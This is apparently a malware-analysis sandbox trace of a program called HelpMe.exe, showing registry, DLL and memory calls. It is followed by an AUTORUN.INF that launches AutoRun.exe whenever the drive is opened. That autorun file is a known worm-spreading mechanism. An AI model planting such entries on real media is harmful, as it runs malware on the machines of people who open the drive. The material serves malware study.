"20190910080051.569","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f6","hKey->HKEY_CLASSES_ROOT","lpSubKey->Directory"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f6","lpSubKey->CurVer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f2","hKey->0x000000f6","lpSubKey->(null)"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f4","lpValueName->DontShowSuperHidden"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->0x000000f4","lpSubKey->(null)"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShellState"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShellState"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->ForceActiveDesktopOn"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoActiveDesktop"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\System"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoWebView"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->ClassicShell"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->SeparateProcess"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoNetCrawling"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoSimpleStartMenu"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->0x000000f4","lpSubKey->Advanced"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->Hidden"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowCompColor"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->HideFileExt"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->DontPrettyPath"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowInfoTip"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->HideIcons"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->MapNetDrvBtn"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->WebView"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->Filter"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowSuperHidden"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->SeparateProcess"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->NoNetCrawling"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f2","lpSubKey->ShellEx\IconHandler"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->DocObject"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->BrowseInPlace"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f2","lpSubKey->Clsid"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fe","hKey->HKEY_CLASSES_ROOT","lpSubKey->Folder"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000fe","lpSubKey->Clsid"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->IsShortcut"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f2","lpValueName->AlwaysShowExt"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->NeverShowExt"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->UseDesktopIniCache"
"20190910080051.639","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x77120000","lpFileName->oleaut32.dll"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->Com+Enabled"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\OLE"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->MinimumFreeMemPercentageToCreateProcess"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->MinimumFreeMemPercentageToCreateObject"
"20190910080051.639","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->Com+Enabled"
"20190910080051.639","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000104","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000114","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000012c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000134","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000144","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000154","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000015c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000164","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000016c","lpValueName->REGDBVersion"
"20190910080051.639","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x0000016c","lpFileName->C:\WINDOWS\Registration\R000000000007.clb","dwDesiredAccess->GENERIC_READ"
"20190910080051.639","1376","HelpMe.exe","372","filesystem","ReadFile","SUCCESS","","hFile->0x0000016c","nNumberOfBytesToRead->22512"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000016c","lpValueName->REGDBVersion"
"20190910080051.649","1376","HelpMe.exe","372","memory","VirtualAllocEx","SUCCESS","0x00b20000","th32ProcessID->1376","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000001"
"20190910080051.669","1376","HelpMe.exe","372","memory","VirtualAllocEx","SUCCESS","0x00b20000","th32ProcessID->1376","szExeFile->HelpMe.exe","lpAddress->0x00b20000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x000000f2","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->TreatAs"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017a","hKey->0x000000f2","lpSubKey->(null)"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x0000017e","lpValueName->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocServerX86"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->(null)"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocHandler32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocHandlerX86"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x0000017e","lpValueName->AppID"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->ThreadingModel"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->TreatAs"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->0x0000017c","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Generation"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000182","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->DriveMask"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000180","lpValueName->AllowFileCLSIDJunctions"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Personal"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegSetValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Personal","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents","cbData->100"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017c","hKey->0x00000180","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017c","lpValueName->Generation"
1376.csv
[autorun]
open=AutoRun.exe
shell\1=Open
shell\1\Command=AutoRun.exe
shell\2\=Browser
shell\2\Command=AutoRun.exe
shellexecute=AutoRun.exe
AUTORUN.INF